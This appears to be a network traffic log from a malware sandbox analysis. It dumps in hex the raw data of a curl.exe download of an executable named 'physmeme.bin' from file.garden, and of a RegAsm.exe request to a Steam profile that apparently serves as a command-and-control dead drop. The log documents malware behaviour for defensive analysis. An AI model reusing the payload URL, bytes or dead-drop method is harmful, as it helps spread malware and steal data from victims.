2024-09-30 16:33:29 UTC	1369	IN	Data Raw: 0b 8d 46 32 50 6a 39 e8 a5 fa ff ff 6a 02 b9 98 10 44 00 e8 3f 53 00 00 5e c2 04 00 53 56 8b f1 33 db 57 53 8b 3e 38 9e 3c 22 00 00 74 3d 8b 86 d8 6c 00 00 8b 4f 10 83 c0 14 53 50 ff 15 78 32 43 00 8b ce ff 57 10 8b ce e8 05 22 00 00 85 c0 74 15 83 be f4 21 00 00 75 75 0c 8b 44 24 10 39 58 04 0f 97 c0 eb 3c 32 c0 eb 38 e8 85 08 00 00 8b 4f 10 52 50 ff 15 78 32 43 00 8b ce ff 57 10 68 70 36 43 00 8b ce e8 3d 26 00 00 85 c0 74 11 ff 74 24 10 8b ce e8 db 04 00 00 84 c0 74 02 b3 01 8a c3 5f 5e 5b c2 04 00 80 b9 d4 6c 00 00 00 8b 54 24 04 74 1a 8b c2 f7 d8 83 e0 0f 03 d0 83 b9 c8 6c 00 00 03 75 05 83 c2 10 eb 03 83 c2 08 8b c2 c2 04 00 55 8b e9 80 bd ce 6c 00 00 00 75 04 32 c0 eb 41 8b 45 00 53 56 57 8b 70 14 8b ce ff 15 78 32 43 00 8b cd ff d6 ff 74 24 14 8b Data Ascii: F2Pj9jD?S^SV3WS>8<"t=lOSPx2CW"t!uuD$9X<28ORPx2CWhp6C=&tt$t_^[lT$tluUlu2AESVWpx2Ct$
2024-09-30 16:33:29 UTC	1369	IN	Data Raw: c0 75 04 6a 02 eb 10 3c 01 75 04 6a 03 eb 08 2c 02 3c 02 77 03 6a 04 59 8b c1 c2 08 00 b8 73 26 43 00 e8 1e cd 01 00 83 ec 18 53 33 db 8b c1 89 45 f0 89 5d dc 89 5d e0 89 5d e4 89 5d e8 88 5d ec 53 53 8d 4d dc 89 5d fc 51 8b c8 e8 36 1d 00 00 84 c0 0f 84 83 00 00 00 56 57 8b 7d e0 8d 4d dc 6a 01 e8 97 f8 ff ff 8b 4d e0 8b 45 dc 8b 75 08 88 5c 01 ff 8d 47 01 50 8b ce e8 f6 f9 ff ff 8b 45 f0 83 b8 c8 6c 00 00 03 75 0f ff 76 04 ff 36 ff 75 dc e8 6f fd 00 00 eb 2d f6 80 0c 46 00 00 01 74 17 d1 ef 57 ff 36 ff 75 dc e8 19 fd 00 00 8b 06 33 c9 66 89 0c 78 eb 0d ff 76 04 ff 36 ff 75 dc e8 89 fc 00 00 ff 36 e8 11 1f 02 00 59 50 8b ce e8 9e f9 ff ff 5f b3 01 5e 8b 45 dc c7 45 fc 02 00 00 00 85 c0 74 19 80 7d ec 00 74 0c ff 75 e4 50 e8 19 d5 00 00 8b 45 dc 50 e8 f9 Data Ascii: uj<uj,<wjYs&CS3E]]]]]SSM]Q6VW}MjMEu\GPEluv6uo-FtW6u3fxv6u6YP_^EEt}tuPEP
2024-09-30 16:33:29 UTC	1369	IN	Data Raw: e9 75 0d 8b 47 18 2b c2 83 f8 01 75 03 8d 69 01 8d b3 28 10 00 00 55 8b ce e8 13 fd ff ff 55 ff 36 8b cf e8 a9 a8 00 00 e9 90 04 00 00 8b cf e8 3b a9 00 00 8b c8 89 44 24 20 c1 e9 02 8d ab 08 21 00 00 80 e1 01 88 8b 06 21 00 00 8b c8 c1 e9 03 80 e1 01 88 8b 07 21 00 00 c6 83 08 22 00 00 00 c6 45 00 00 a8 01 74 29 8b cf e8 ff a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 55 8b cf e8 4b a8 00 00 8b 44 24 20 c6 84 1e 08 21 00 00 00 a8 02 74 2b 8b cf e8 d2 a8 00 00 8b f0 b8 ff 00 00 00 3b f0 72 02 8b f0 56 8d 83 08 22 00 00 8b cf 50 e8 18 a8 00 00 c6 84 1e 08 22 00 00 00 80 bb 06 21 00 00 00 74 0d 8b cf e8 9e a8 00 00 89 83 08 23 00 00 80 bb 07 21 00 00 00 74 0d 8b cf e8 88 a8 00 00 89 83 0c 23 00 00 c6 83 05 21 00 00 01 e9 c4 03 00 00 8b cf e8 6f a8 00 Data Ascii: uG+ui(UU6;D$ !!!"Et);rVUKD$ !t+;rV"P"!t#!t#!o
2024-09-30 16:33:29 UTC	1369	IN	Data Raw: ff d6 83 f8 08 74 0c 8b cb e8 09 17 00 00 e9 e2 09 00 00 33 c9 8d 45 40 51 51 51 51 50 8b 83 d4 21 00 00 8d b3 38 10 00 00 05 24 60 00 00 50 6a 04 51 8b ce e8 1c 37 00 00 89 75 3c eb 03 88 4d 5a 57 8d 4d 1c e8 5b a4 00 00 83 7d 34 00 74 b7 8d 4d 1c e8 89 a2 00 00 0f b7 c0 8d 4d 1c 89 83 fc 21 00 00 c6 83 0c 22 00 00 00 e8 5a a2 00 00 8d 4d 1c 0f b6 f0 e8 66 a2 00 00 0f b7 c0 8d 4d 1c 89 83 04 22 00 00 c1 e8 0e 24 01 88 83 0c 22 00 00 e8 4a a2 00 00 0f b7 c8 89 8b 08 22 00 00 89 b3 00 22 00 00 3b cf 73 0c 8b cb e8 41 f7 ff ff e9 3f 09 00 00 8b c6 6a 02 5a 83 e8 73 74 2a 83 e8 01 74 1b 83 e8 06 74 09 83 e8 01 75 28 6a 05 eb 02 6a 03 58 89 83 00 22 00 00 8b f0 eb 17 89 93 00 22 00 00 8b f2 eb 0d 33 f6 c7 83 00 22 00 00 01 00 00 00 46 89 b3 f4 21 00 00 83 fe Data Ascii: t3E@QQQQP!8$`PjQ7u<MZWM[}4tMM!"ZMfM"$"J"";sA?jZst*ttu(jjX""3"F!
2024-09-30 16:33:29 UTC	1369	IN	Data Raw: 50 e8 4c 10 02 00 40 59 3b f8 76 22 68 00 08 00 00 ff 75 54 8b cf 2b c8 51 8d 8d d0 df ff ff 03 c1 50 8b c1 8d 4d 00 57 50 e8 1a 3b 00 00 8b 4d 54 33 c0 66 39 01 75 14 6a 01 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 30 d4 00 00 56 8b cb e8 a2 f2 ff ff e9 3f 01 00 00 68 00 08 00 00 51 8d 85 d0 df ff ff 50 e8 db ec 00 00 8b 46 0c 2b 45 50 f7 46 08 00 04 00 00 8d 78 e0 74 03 8d 78 d8 85 ff 0f 8e f6 00 00 00 8d 8e 28 10 00 00 57 e8 eb f1 ff ff 57 8d be 28 10 00 00 ff 37 8d 4d 1c e8 7a 9d 00 00 68 78 36 43 00 ff 75 54 e8 59 0f 02 00 59 59 85 c0 0f 85 c2 00 00 00 83 be 2c 10 00 00 14 0f 82 b5 00 00 00 8b 0f 0f b6 41 0b 99 8b f0 8b fa 0f b6 41 0a 0f a4 f7 08 99 c1 e6 08 03 f0 0f b6 41 09 13 fa 99 0f a4 f7 08 c1 e6 08 03 f0 0f b6 41 08 13 fa 99 0f a4 f7 08 c1 e6 Data Ascii: PL@Y;v"huT+QPMWP;MT3f9ujhQP0V?hQPF+EPFxtx(WW(7Mzhx6CuTYYY,AAAA
2024-09-30 16:33:29 UTC	1369	IN	Data Raw: d6 83 f8 10 0f 85 17 01 00 00 8b 83 d4 21 00 00 80 b8 24 61 00 00 00 75 0d e8 ae e7 00 00 c6 45 6b 00 84 c0 74 04 c6 45 6b 01 8b cb e8 a5 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 8d bb 7c 22 00 00 57 05 24 60 00 00 8d b3 38 10 00 00 50 6a 05 51 8b ce e8 3e 2c 00 00 80 bb 74 22 00 00 00 74 7d 8d 83 8c 22 00 00 6a 08 50 8d 45 28 50 e8 33 d8 01 00 83 c4 0c 85 c0 74 64 80 7d 6b 00 8d 43 32 50 50 75 5e 68 83 00 00 00 e8 ee eb ff ff 8b 8b d4 21 00 00 81 c1 24 60 00 00 e8 35 be 00 00 8b cb e8 22 0a 00 00 8d 45 28 33 c9 50 51 ff b3 78 22 00 00 8d 45 18 50 8b 83 d4 21 00 00 57 05 24 60 00 00 50 6a 05 51 8b ce e8 c7 2b 00 00 80 bb 74 22 00 00 00 8d 83 8c 22 00 00 75 89 89 75 50 eb 22 6a 06 e8 93 eb ff ff 6a 0b b9 98 10 44 00 c6 Data Ascii: !$auEktEkE(3PQx"EP!\|"W$`8PjQ>,t"t}"jPE(P3td}kC2PPu^h!$`5"E(3PQx"EP!W$`PjQ+t""uuP"jjD
2024-09-30 16:33:29 UTC	1369	IN	Data Raw: 00 8d 4d 30 88 46 18 e8 ff 93 00 00 8b 8b 04 22 00 00 33 d2 c1 e9 06 42 8b f8 c7 86 fc 10 00 00 02 00 00 00 8a 46 18 22 ca 88 8e f8 10 00 00 3a c2 75 08 89 96 fc 10 00 00 eb 0b 84 c0 75 07 83 a6 fc 10 00 00 00 8b 4e 08 8b c1 c1 e8 03 22 c2 88 86 98 10 00 00 8b c1 c1 e9 05 c1 e8 04 22 ca 22 c2 88 8e fa 10 00 00 83 7d 64 02 8b 4d 60 88 86 99 10 00 00 75 09 f6 c1 40 74 04 8a c2 eb 02 32 c0 88 86 f0 10 00 00 8a 86 94 10 00 00 22 c2 c1 e9 0a 88 86 f1 10 00 00 83 e1 0f 0f b6 c0 ba 00 00 02 00 d3 e2 f7 d8 1b c0 f7 d0 23 c2 89 86 f4 10 00 00 0f b6 86 9b 10 00 00 f7 d8 1b c0 83 e0 05 89 86 9c 10 00 00 b8 ff 1f 00 00 3b f8 72 02 8b f8 57 8d 85 8c df ff ff 50 8d 4d 30 e8 8a 92 00 00 c6 84 3d 8c df ff ff 00 8d 85 8c df ff ff 68 00 08 00 00 8d 7e 28 57 50 e8 4b e2 00 Data Ascii: M0F"3BF":uuN"""}dM`u@t2"#;rWPM0=h~(WPK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49704	188.114.96.3	443	2172	C:\Windows\System32\curl.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:33:32 UTC	104	OUT	GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1 Host: file.garden User-Agent: curl/7.83.1 Accept: /
2024-09-30 16:33:32 UTC	814	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:33:32 GMT Content-Type: application/octet-stream Content-Length: 370176 Connection: close x-powered-by: Express access-control-allow-origin: * content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval' last-modified: Sun, 22 Sep 2024 19:01:04 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 682255 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iIadF%2F%2BdbyBcLGmO9dxhkzegxKqiDZ6IAkojzejneEfVvr4Tkl8zDDkxU5LAHIJL0uKHgCpZUkdXmNTCfdLf743pvCMXngx2fn%2F10smD8da0oyautXNCqcYskAmXDw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb59d840e055e78-EWR
2024-09-30 16:33:32 UTC	555	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa 57 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 be bb 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWf @ `
2024-09-30 16:33:32 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 39 6d 95 5b 1c e7 2e 7b bf 94 a8 e9 8e 56 e9 5f 41 b3 ac 5f e4 ac 13 58 c3 bf b8 5b 6d 93 27 cd e6 23 51 f2 b8 9f 1c 93 a1 8d dd 2e 5b ca d0 8d 2b 48 f0 3c fc 85 66 5a f5 10 7c e6 ca aa 13 03 07 6d 26 d3 2e 1d a0 19 bf 79 aa bb 3b 4b 52 05 a6 94 af 37 a1 e7 53 c2 c0 6b 93 6d 3f f3 b7 38 08 a7 49 44 26 de 21 30 25 4e 21 5c 01 5c 06 cb 4c 5e 1e 1b cd 88 30 5c 11 b1 df cf 02 6a 7c a1 4d 85 ac fa af 1f 8a 8c 0f eb 4d ab 3b db 2a 86 71 ff b7 55 4f fa e8 21 27 b3 f3 25 2e 20 64 ba 45 ee 75 97 cb 8a 83 ea ee d2 51 2d 77 d4 a5 24 49 01 be e9 58 8f df d0 30 64 10 b5 f9 06 ea 88 a4 eb 9f 66 bd 24 7c 28 09 67 45 a9 4e 10 89 8c 33 a0 4a 99 0d 2a 54 b2 3f Data Ascii: 9m[.{V_A_X[m'#Q.[+H<fZ\|m&.y;KR7Skm?8ID&!0%N!\\L^0\j\|MM;qUO!'%. dEuQ-w$IX0df$\|(gEN3JT?
2024-09-30 16:33:32 UTC	1369	IN	Data Raw: c2 32 1f a5 ff 5b 35 43 95 d0 93 a5 1d a0 c3 58 22 2c a4 8d eb c5 fb 07 a9 8c df 5f f7 3a 6b 24 02 f0 81 4a 34 0a bb 38 51 98 33 fa 65 0b 92 ff ae 2c c0 7c 6b 10 c6 53 66 e5 bd 95 5e 9e e7 4f 4d 77 1b 9f e6 d6 81 bd fd d1 7a ea 2d 8a f4 43 c6 c2 51 d2 6c 6c fa 8a f1 c2 1a c5 e5 40 96 c2 58 1b 78 42 71 52 38 56 21 63 6c c4 84 06 d5 0a 09 01 80 fb 8c ee 9d 40 14 bc d6 47 4b a8 ca c3 14 80 32 95 6c 0e f9 bf 9d 42 e4 df 07 88 e3 17 54 d4 eb 1f 8d fc fb 25 b2 aa 14 da ed 36 3e 13 c6 03 cb 68 dc 6b 69 86 6f bb b7 df 52 21 f8 a0 d8 79 dd f8 77 d5 8b 01 5a c2 cc 90 80 f0 bc b5 7b bc 30 3c bc 54 2c bc 22 03 9e 29 a1 f5 4a d4 54 08 f4 e9 58 f9 89 ca 72 b3 26 56 3d 3b 0d 3d e4 13 b4 4f ff ec ca de ec e9 38 17 7b be 01 fc fb 2f 3e e0 25 b2 a7 1d 38 f3 f5 0a f5 d2 f4 Data Ascii: 2[5CX",_:k$J48Q3e,\|kSf^OMwz-CQll@XxBqR8V!cl@GK2lBT%6>hkioR!ywZ{0<T,")JTXr&V=;=O8{/>%8
2024-09-30 16:33:32 UTC	1369	IN	Data Raw: f9 d8 b9 97 ee d9 92 7d 3e c4 20 3a b4 ef 3f 15 dd f7 b7 8f cf 6d 91 51 45 42 e7 d4 5f d8 c4 0c 7c e9 fb f3 db 4f bb fe 99 be ed ae 68 51 b5 c1 77 4f e5 0e 85 dd 21 aa 19 5e 53 de 6a d4 6d 55 c1 54 09 09 8f 24 26 51 79 d7 75 7f db c2 b9 80 3c a9 a0 a9 a2 70 ec e2 35 36 cd 8d 62 94 1a 29 c5 91 4f 66 f5 51 d8 38 d2 15 c0 e2 7d 85 38 ec 10 4f 7e 17 29 56 5c b7 7f f2 05 74 78 ab 7d d9 d6 08 40 c1 10 bf c9 f0 cd 7f e3 91 29 3d 26 4c 52 4f b5 56 07 91 05 b8 a8 5f 80 bc 75 88 1b 80 26 17 21 df e3 fb 96 1c 59 3a 69 39 0b f3 ea 2a 51 28 ff 5c b0 a9 b3 bb de 18 a9 c7 56 89 d3 9b aa a3 e4 50 b4 ba 0f 90 bc 42 ac be b7 86 c2 b5 be 9c 76 11 87 f6 46 d2 59 28 4c a3 78 5f 77 ab e6 ae e2 b3 9d ee 08 d2 e1 90 44 7b e6 a2 ba 8a 00 91 c5 71 c7 ca 5d 50 7e aa b6 63 87 b0 74 Data Ascii: }> :?mQEB_\|OhQwO!^SjmUT$&Qyu<p56b)OfQ8}8O~)V\tx}@)=&LROV_u&!Y:i9*Q(\VPBvFY(Lx_wD{q]P~ct
2024-09-30 16:33:32 UTC	1369	IN	Data Raw: c2 e3 5f 0f 28 43 ce 78 12 84 32 75 5d 67 61 3c b1 30 99 eb 62 5f f5 ce 44 19 f7 9e 6d 03 72 57 32 55 f6 bb 09 c5 f5 dc 74 09 cb 53 22 20 0b 38 f6 45 fd 98 35 71 18 c7 ae 85 5a b2 a3 9d ca e1 74 b9 2c 38 46 12 80 7a 12 69 58 c8 70 ba bc 0a 2d 1e 45 36 ce d2 8b 70 53 7e 20 ec 34 31 78 04 fe 8a 18 6e f8 ac b8 89 ff 37 50 e4 bc c6 ae 3b bd e1 8b 5f f2 cf 48 37 03 e3 5e b0 99 0a fc f1 0c c6 71 b8 61 bc 40 30 a8 32 48 80 c9 79 28 a8 e6 23 e6 ce 51 a8 4d b8 43 82 cf ec 82 6b 2f fd 16 b1 42 db 64 5d 91 b4 8d 5d 02 a0 54 a9 04 cd 1b 18 09 86 07 0b d8 79 34 0d ea 9e 67 aa 2f 84 48 3c c7 e3 4e ff fa 02 89 6c a1 f2 e5 35 78 62 2d f2 74 05 c4 6c 2e e0 39 5c c0 e1 b1 e8 92 43 fe ba 0f 24 99 79 3f 57 dd 01 c3 7d 15 e4 a1 c8 40 5d 17 e3 f9 da 2b e2 6a 04 70 2d da f3 d4 Data Ascii: _(Cx2u]ga<0b_DmrW2UtS" 8E5qZt,8FziXp-E6pS~ 41xn7P;_H7^qa@02Hy(#QMCk/Bd]]Ty4g/H<Nl5xb-tl.9\C$y?W}@]+jp-
2024-09-30 16:33:32 UTC	1369	IN	Data Raw: 47 9a 42 3b c2 38 5b 0d d5 23 a7 ed 53 cd ad 7f 5b 54 8e 86 00 b4 96 ee 53 43 ee 85 90 aa 8d 74 38 57 58 fe 24 b8 00 30 95 3c 4e 10 74 29 7a 22 be df d5 50 1e ba 4b bb f7 a6 73 c4 b4 ac 88 37 ec bb 69 8c da c0 5f f9 07 4e 93 37 ca 97 ec d5 ae 44 d1 88 72 e4 a1 8b 09 f6 ef b8 a5 55 60 50 f3 c4 a4 3b 19 c1 57 7b 18 70 8a 80 c6 ed 1f 1f 87 cb fe 9b e9 9b f3 e7 3a 9d 86 36 65 23 04 74 33 a1 ff 0d fc 64 b3 8c a0 cd 4f 3d 12 c7 a5 61 09 85 d7 5b d3 a2 13 08 46 40 ea 3f 82 ff 89 f7 66 30 aa 12 0c cc 8d 86 54 a6 5f 5c f6 53 76 4d ca 8c da 1d eb 63 b9 0e c7 65 a9 78 f1 31 33 40 6a fa 95 8c c9 ad 98 8b e9 e0 27 9d 9e 6e d9 42 d1 ae a6 7b 2e 5b 25 d8 13 d0 ee a3 d3 fe 89 77 fc bd 93 5a bd 72 a9 4e 2a cf 1e 96 85 1b d0 82 ea 04 dc f2 3e 36 15 ad 97 5a f9 ff 8d 05 a2 Data Ascii: GB;8[#S[TSCt8WX$0<Nt)z"PKs7i_N7DrU`P;W{p:6e#t3dO=a[F@?f0T_\SvMcex13@j'nB{.[%wZrN*>6Z
2024-09-30 16:33:32 UTC	1369	IN	Data Raw: 33 8e da 2c 8f cd 05 db 65 80 ec 7a 7d 93 eb 70 e9 a7 88 2d 10 90 61 90 bb 00 94 84 e5 c7 98 27 c5 0e 75 a6 98 05 03 7a f5 5e 6c d0 54 fc 36 f8 c7 26 ae 1c 53 3a e2 de 31 97 91 67 c6 3c 2f 47 b8 4b 17 9f 70 01 93 92 a1 e6 0f 88 b3 d8 d3 2c 56 d6 fe f3 7a 98 e0 33 39 b4 43 fb a3 e8 11 4c 57 ad 59 86 68 03 88 a4 bd 93 44 5c b9 bb 4b af bb 47 21 96 fe 97 60 1f 98 67 35 89 f1 5c dd b4 65 e3 09 a6 1a a8 d8 5a c5 30 5f 9e 04 6b ec 2f 70 03 1e 33 f8 88 ec 77 97 c3 a4 2e 0e f7 fc 83 18 8b e3 99 37 8b 4a b1 36 d7 23 5a 35 a7 51 cb b8 a9 52 e4 3d c9 05 5e 26 95 e5 c8 39 37 f8 f5 e0 0c 58 cb 23 8c 73 47 b8 f4 fa e6 fb 60 21 11 bd 12 de 17 b3 b8 b6 26 4d d7 80 3c 7e f4 f7 c5 b6 d8 7d a5 6d 14 b7 d8 58 eb 8f 7f f0 29 43 73 5f e3 66 34 b3 7d 6a 56 cb 03 97 dc 95 c2 9d Data Ascii: 3,ez}p-a'uz^lT6&S:1g</GKp,Vz39CLWYhD\KG!`g5\eZ0_k/p3w.7J6#Z5QR=^&97X#sG`!&M<~}mX)Cs_f4}jV
2024-09-30 16:33:32 UTC	1369	IN	Data Raw: 67 d8 fd 78 fb a4 4a 66 99 b7 53 7b ab 06 7e 5a 05 99 c0 73 8c 4e 9a 7f e0 a9 b8 bb 14 a6 a8 5c 1a a0 70 56 77 95 cb 60 ea f7 bd 64 a8 ad ed 88 06 bb 5b 72 ee d7 a1 63 0c c0 b6 e0 94 e1 89 45 44 62 8f 3d a8 94 a1 e7 09 42 7c 41 33 28 c6 58 3d 1d da 3f e7 7b 49 70 e7 35 60 9f 9b 87 44 53 df 66 84 31 6a ee 36 26 46 b0 56 9e c8 fb 80 f2 ca b0 63 9b 0d 09 0b 4e 91 13 12 49 99 55 15 a3 9d 4d 82 75 63 d2 30 d5 c5 09 a7 84 19 fe bc 83 9e e6 4d 65 a2 3f 84 12 43 c6 a8 38 32 73 41 50 39 92 3f 92 ce 36 d4 69 d5 e5 32 cf 30 46 44 1f 74 23 d4 43 b8 34 1d 3f 70 41 e9 7c e1 92 79 a3 55 73 6d 6a 8d 65 7c 11 5c 0e 3c f1 7f 8d bb bb 5f 0b da fd c8 74 09 64 d8 20 c1 d3 24 7d 84 64 34 cd fe 4e 6c af 36 fe 81 2a 0b f1 19 ac 66 a3 ad 8f e9 b1 09 d3 d4 94 e6 63 89 1f 5f 04 98 Data Ascii: gxJfS{~ZsN\pVw`d[rcEDb=B\|A3(X=?{Ip5`DSf1j6&FVcNIUMuc0Me?C82sAP9?6i20FDt#C4?pA\|yUsmje\|\<_td $}d4Nl6*fc_
2024-09-30 16:33:32 UTC	1369	IN	Data Raw: 41 c4 21 cd 72 e1 17 34 2f 56 df 2b d7 80 70 53 e2 5f 70 18 8b 55 25 32 1a 39 0b 05 fb 5c 9a 55 a5 3f 8a 3b da 24 81 58 a3 8a ad 79 c7 8c e4 c2 21 9f 3e 1f 46 66 e1 ff 39 d9 33 82 52 a4 b1 4b a6 e1 ea 7a 06 56 3c 2a bb ec 8c d3 3a 65 c9 90 79 ab cf 79 7d b5 8d d9 56 c2 98 b3 54 5a 5a 3d 2c 24 eb 0c 12 47 7a 2a 5c b7 64 e1 ee 3e 76 7b bc eb 66 23 88 d0 2a ef 2f cb 4b 5e 66 5f 47 f4 ba a6 81 78 3a a6 5d 97 0c 3a ff 2e c9 51 e4 b5 d5 3a 7e 3c f1 26 eb ec 98 a2 b4 83 9c 3f 21 20 2e 13 a1 f2 da 4b 3d f4 2c f3 72 e8 eb 50 33 e4 ef 1e 1a 92 bb 48 1c da a3 36 34 b2 eb 90 4e af 06 bc 31 da ea 38 8d 15 d1 85 5d 52 6e 0b 99 9a a1 3c b6 6d 53 3f ad 6f 64 a3 f4 95 fa 0d 9c ab 44 37 03 53 68 f0 8f c3 56 5e 4a 41 81 ff 4b 93 f4 56 6a cd 5c 7e 19 a7 90 8a 89 65 d3 70 24 Data Ascii: A!r4/V+pS_pU%29\U?;$Xy!>Ff93RKzV<:eyy}VTZZ=,$Gz\d>v{f#*/K^f_Gx:]:.Q:~<&?! .K=,rP3H64N18]Rn<mS?odD7ShV^JAKVj\~ep$
2024-09-30 16:33:32 UTC	1369	IN	Data Raw: e9 2e bc d8 05 68 d8 da f5 21 9f a7 4c a0 33 85 79 90 91 bd 38 73 36 7d 2a d6 a9 8a 2e 5e 35 6b 60 d7 49 b9 f9 9b 04 ce 38 5b de b3 1c 04 1f 5d e5 f0 2d e8 5c ae ef 28 57 2f 89 1e d5 5b da 3a 3d 16 58 6f 5f 40 af 93 12 92 0b 71 c6 87 b4 b6 88 a7 24 87 22 97 47 9d 38 9d a8 d2 74 8b aa cb c0 ff cc 05 fc 0d 78 25 72 3a 80 32 16 d0 59 2d dd 4e 6f 73 b1 cf 53 6d e5 25 8e 0a 41 5e ff 54 32 e0 3c 2f 7c aa f0 7f c1 4c 7c 5b 9c 08 c1 8c fb 32 7d c4 01 de 63 72 22 44 0a 65 4e bf 18 29 d7 76 bd 76 5f 91 65 48 2a 8b a9 ec 34 e3 6a 6e f5 bf 6d 13 83 9a 24 ef 95 57 53 10 c8 9d ca fb 5f 6b ff b5 07 a8 aa 35 a1 63 95 a4 f3 03 b1 9e 3a 11 54 d2 e6 95 ea 69 d4 4e 53 93 fe e1 e5 52 6a d5 58 f2 90 2a 27 12 cf 54 44 d4 08 b2 ce 94 7c c2 af fd 4b 7b e0 ea d9 ed 33 b5 05 f6 31 Data Ascii: .h!L3y8s6}.^5k`I8[]-\(W/[:=Xo_@q$"G8tx%r:2Y-NosSm%A^T2</\|L\|[2}cr"DeN)vv_eH4jnm$WS_k5c:TiNSRjX*'TD\|K{31

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49705	104.102.49.254	443	7312	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:33:36 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-30 16:33:36 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 30 Sep 2024 16:33:36 GMT Content-Length: 34678 Connection: close Set-Cookie: sessionid=5e03757b3701ffbdc022c322; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-30 16:33:36 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
